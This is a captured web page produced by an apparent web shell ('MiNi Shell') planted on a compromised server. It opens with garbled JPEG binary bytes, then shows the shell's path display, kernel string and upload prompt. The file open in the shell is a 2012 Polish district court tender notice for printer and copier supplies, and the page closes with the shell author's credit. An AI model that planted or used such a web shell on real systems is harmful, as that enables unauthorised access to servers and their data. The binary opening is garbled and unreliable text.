JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120119/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120119/17572-N-2012.html

<p class="kh_header"><b>Krasnystaw: Dostawa materialów eksploatacyjnych do drularek, kserokopiarek, urządzeń wielofunkcyjnych i faxów oraz odbiór i utylizacja zużytych kaset</b><br>
<b>Numer ogłoszenia: 17572 - 2012; data zamieszczenia: 19.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Rejonowy , ul. Poniatowskiego 31, 22-300 Krasnystaw, woj. lubelskie, tel. 082 5762801, faks 082 5763305.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materialów eksploatacyjnych do drularek, kserokopiarek, urządzeń wielofunkcyjnych i faxów oraz odbiór i utylizacja zużytych kaset.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1). dostawa materiałów eksploatacyjnych do drukarek laserowych, kserokopiarek, urządzeń  wielofunkcyjnych i faksów będących na wyposażeniu Sądu Rejonowego w Krasnymstawie oraz odbiór i utylizacja zużytych kaset:
a)	drukarki:
-	HP LJ 1010, 1018, 1020, 1022, P1102W, P2055dn,
-	Samsung ML 4551N, ML 2855 ND, 
-	Lexmark E 12n, 352dn, 
-	Dell 2230D,
-	OKI B 5600dn,
-	Brother HL 2030,
-            Intermec Easy Coder PD41,
b)	kserokopiarki:
-	Sharp AR 5015, 5012, 5316,
-	Minolta EP 1054, EP 1030,
-	Kyocera KM 2020,
c)	urządzenia wielofunkcyjne:
-	Toshiba e-studio 182, T-2021,
d)	faxy:
-	Panasonic KX-FC 195
Dostarczone materiały eksploatacyjne wyszczególnione w tabeli poniżej maja być oryginalne tj. wyprodukowane przez producenta urządzenia lub równoważne oryginalnym. Przez pojecie -równoważn- Zamawiający rozumie produkt kompatybilny ze sprzętem (urządzeniem), do którego jest zamówiony, o parametrach takich samych lub lepszych (wydajność, szybkość schnięcia, nie zamazywanie się druku, nie zanieczyszczanie urządzenia wkładem barwiącym) w stosunku do oryginału produkowanego przez producenta urządzenia. 
Materiały eksploatacyjne muszą być fabrycznie nowe, nieużywane, wolne od wad, kompatybilne i o najwyższej jakości, oryginalnie zapakowany nie noszące śladów otwierania, nie regenerowany, nie poddawany procesowi ponownego napełniania, recyklingu, demontażu lub wymiany jakichkolwiek elementów. Za fabrycznie nowy nie uznaje się wyrobu gdzie pojemnik został jedynie wyczyszczony i ponownie napełniony tzw. regenerowany.
Wykonawca powinien dostarczyć Zamawiającemu dokładnie ten towar, który jest wymieniony w zamówieniu i który został przez niego zaoferowany. W związku z tym Zamawiający wymaga, a by Wykonawca wyplenił kolumnę -e - tabeli znajdującej się w załączniku Nr 3 do SIWZ (wzór Formularza cenowego). Opisy zamieszczone przez Wykonawców w w/w kolumnie traktowane będą jako deklaracja Wykonawcy dotycząca dostarczanych przez niego towarów oraz będą służyły Zamawiającemu do sprawdzenia, czy dostarczane przez wybranego Wykonawcę towary są zgodne z zaoferowanymi.Wykonawca zobowiązany jest do udzielenia gwarancji na dostarczone tonery do wyczerpania się środka barwiącego. 
Stosowanie materiałów równoważnych nie może naruszać warunków gwarancji urządzeń.
Wykonawca bierze na siebie pełną odpowiedzialność za uszkodzenie sprzętu spowodowane używaniem zaoferowanych materiałów eksploatacyjnych. W przypadku dostarczenia materiałów, których użycie spowoduje uszkodzenie urządzenia drukującego, potwierdzone przez przedstawiciela autoryzowanego serwisu producenta urządzeń - Wykonawca zobowiązany będzie do usunięcia tych uszkodzeń w autoryzowanym serwisie producenta urządzeń na swój koszt w terminie 7 dni od daty zgłoszenia uszkodzenia przez zamawiającego oraz do zwrotu kosztów związanych z wydaniem opinii/ekspertyzy. W przypadku trwałego uszkodzenia urządzenia (braku możliwości dokonania naprawy) Wykonawca zobowiązany będzie do dostarczenia fabrycznie nowego urządzenia o takich samych lub wyższych parametrach (standardzie, funkcjonalności) lub zwrotu kosztów brutto zakupu nowego urządzenia lub innego o takim samym lub nie gorszym standardzie i funkcjonalności oraz takich samych lub lepszych parametrach.
W przypadku gdy toner spowoduje zabrudzenie mechaniczne urządzenia przez wysypujący się wkład barwiący, Wykonawca zobowiązany będzie do oczyszczenia urządzeń w siedzibie Zamawiającego na własny koszt w terminie 48 godzin od otrzymania zgłoszenia od Zamawiającego. 
Wykonawca zobowiązany będzie dostarczyć materiały eksploatacyjne spełniające wymagania Zamawiającego. Ponadto powinny być one zgodne co do producenta, typu, modelu i nazwy z tymi, które Wykonawca zaoferował.
W trakcie realizacji umowy, Wykonawca zobowiązany będzie do dostarczenia materiałów eksploatacyjnych partiami - w formie zamówień cząstkowych (świadczeń częściowych) stosownie do potrzeb zamawiającego. Wielkość i termin dostarczenia każdej partii materiałów eksploatacyjnych będzie wynikać z jednostronnej dyspozycji Zamawiającego przesłanej pisemnie, faxem lub drogą elektroniczną. Dostawy częściowe należy realizować najpóźniej w terminie 5 dni roboczych od momentu złożenia dyspozycji przez Zamawiającego. 
Wykonawca będzie zobowiązany odebrać od Zamawiającego na każdorazowe żądanie zużyte kasety i zutylizować je, co potwierdzi odpowiednim dokumentem (protokół odbioru odpadu).
 Szczegółowe wymagania dotyczące zamawianych materiałów eksploatacyjnych:

Zakres dostaw
1. HP LJ 1010/ 1018/ 1020/ 1022,  Toner Q 2612A, 2 300 stron, szt. 70
2.HP LJ P1102W, Toner CE 285A, 1 600 stron, szt. 40
3. HP LJ P 2055dn,	Toner CE 505x,,6500 stron, szt. 12
4. Samsung ML 4551N,Toner ML D4550B, 20 000 stron, szt. 16
5.Samsung ML 2855 ND..Toner, MLT-D2092L, 5 000 stron, szt. 20
6. Lexmark E 12n, Toner 12016SE, 2 500 stron, szt. 6
7. Lexmark E 12n, Bęben 12026XW, 25 000 stron, szt. 1
8. Lexmark 352dn,Toner E250A11E, 3 500 stron,szt.,2
9. Lexmark 352dn, Bęben E250X22G, 30 000 stron, szt. 2
10. Dell 2230D, Toner N797K, 3 500 stron, szt. 12
11. Dell 2230D, Bęben Pk 496, 30 000 stron, szt. 4
12. OKI B 6500dn, Toner wraz z bębnem 09004462, 22 000 stron, szt. 5
13. Brother HL 2030, Toner TN-2000, 	2 500 stron, szt. 1
14. Brother HL 2030, Bęben  dr-2000, 12 000 stron, szt. 1
15. Sharp AR 5015, Toner AR-202T, 18 000 stron, szt. 2
16. Sharp AR 5012,Toner AR-168T, 8 000 stron, szt. 1
17. Sharp AR 5316, Toner AR-016T, 17 000 stron, szt. 3
18. Minolta EP 1054, Toner MT 104B, 270 g, op.	1
19. Minolta EP 1030, Toner MT 103B, 55g, op.	1,
20.Kyocera KM 2050, Toner TK-410, 15 000 stron, szt. 1
21. Toshiba e-studio 182,Toner T-1810E, 24 000 stron, szt. 2
22. Toshiba T- 2021,Toner 203 SD, 8 000 stron, szt. 6
23. Panasonic KX-FC 195, Folia termo transferowa, FA-55A/X, 220 x 50, op.	5
24. Intermec Easy Coder PD41, etykiety samoprzylepne wykonane z folii polietylenowej, ilość etykiet w 1 rolce 150m, o rozmiarze 80 mm x 50 mm, 16 rolek,
25. Intermec Easy Coder PD41, yasma termotransterowa zywiczna czarna, 1 rolka tasmy powinna odpowiadc jedenj rolce etykiet samoprzylepnych opisanych pod poz. 24, rozmiar 80 mm x 50 mm, 16 rolek..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.21.13-6, 30.12.51.10-5, 30.12.51.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nieżąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna, że powyższy warunek został spełniony jeżeli Wykonawca złoży oświadczenia o spełnieniu warunków udziału w postępowaniu, określonych przez Zamawiającego na podstawie art. 22 ust. 1 uPzp, według wzoru stanowiącego załącznik nr 3 do SIWZ;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że powyższy warunek został spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych wykonuje należycie, co najmniej dwie dostawy polegających na dostarczaniu materiałów eksploatacyjnych do drukarek, kserokopiarek, urządzeń wielofunkcyjnych i faxów, o wartości min. 30 000 zł brutto każda.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - rodzaj materiałów eksploatacyjnych - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.karsnystaw.sr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Rejonowy
ul. Poniatowskiego 31, 22-300 Krasnystaw
pokój nr 104, I pietro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2012 godzina 11:00, miejsce: Sąd Rejonowy
ul. Poniatowskiego 31, 22-300 Krasnystaw
pokój nr 104, I pietro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com